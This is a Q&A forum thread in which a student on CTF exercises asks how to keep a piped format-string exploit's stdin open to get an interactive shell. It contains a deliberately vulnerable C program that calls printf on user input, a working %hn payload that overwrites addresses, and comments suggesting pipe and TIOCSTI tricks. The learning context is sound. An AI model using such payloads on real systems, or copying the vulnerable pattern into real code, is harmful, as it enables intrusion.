# How to send input to process' STDIN from terminal without sending EOF?

Tags: bash, shell, ubuntu, tty

I'm studying computer science and doing security exercises at https://ctf101.org/ and exploit exercises in my free time.

I want to send input to a program's STDIN (i.e. the payload below) in a format-string exploit exercise, where the program is reading from `fgets()` twice.

Now, if I pipe the payload (see below), then `system("sh;#")` is executed, but it exits immediately, since the pipe sends `EOF`?

I've also checked the program's `tty`, and then writing to `/dev/pts/0`, but that doesn't work. Neither does it work to write to `/proc/PID/fd/0`.

How can I write to the program's STDIN, so that the call `system("sh;#")` will result in an interactive shell (not terminating immediately)?

```
python -c 'print("sh;#"+"%54012x"+"%12$hn"+"%09441x"+"%13$hn"+"##"+"\x50\x33\x40\x00\x00\x00\x00\x00"+"\x52\x33\x40\x00\x00\x00\x00\x00")' | env -i ./fmtstr0x1
```

The complete program:

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define BUFSZ 128

int main(int argc, char** argv) {
    char buffer[BUFSZ];
    fgets(buffer, BUFSZ, stdin);
    printf(buffer);
    fgets(buffer, BUFSZ, stdin); // exploit this!
    return 0;
}
```

Comment: I haven't tried your exploit, but you certainly can keep your pipe open with `{ python -c '...'; cat; } | ./exploitable_program`.

Comment: Nobody is [sending any EOF](https://unix.stackexchange.com/search?q=send+eof)  through a pipe, ever.

Comment: If you want your shell to run with prompt and all interactive features, you can inject the payload with ioctl(TIOCSTI) instead of redirecting its input from a pipe -- example with tiocsti demo from [here](https://unix.stackexchange.com/a/493684/308316): `printf 'exploit' | ./tiocsti & env -i ./fmtstr0x1`.

Comment: Can you explain **what** (not just how) you are trying to do?

Comment: @mosvy - why don't you call an EOF an event?

Comment: @Shuzheng please read my [answer](https://unix.stackexchange.com/a/499732/308316) to the 1st answer from the search link -- a read(2) on the reading end of a pipe will return 0 (EOF) when all handles to its writing end are closed. So all you have to do is to keep a handle to the writing end open, and keep feeding data to the shell through it.

Comment: @mosvy - what is your definition on an "event" in your answer (a signal?)? Isn't it an event that read() returns 0? Do you know how to keep a write handle open using terminal commands :-) ?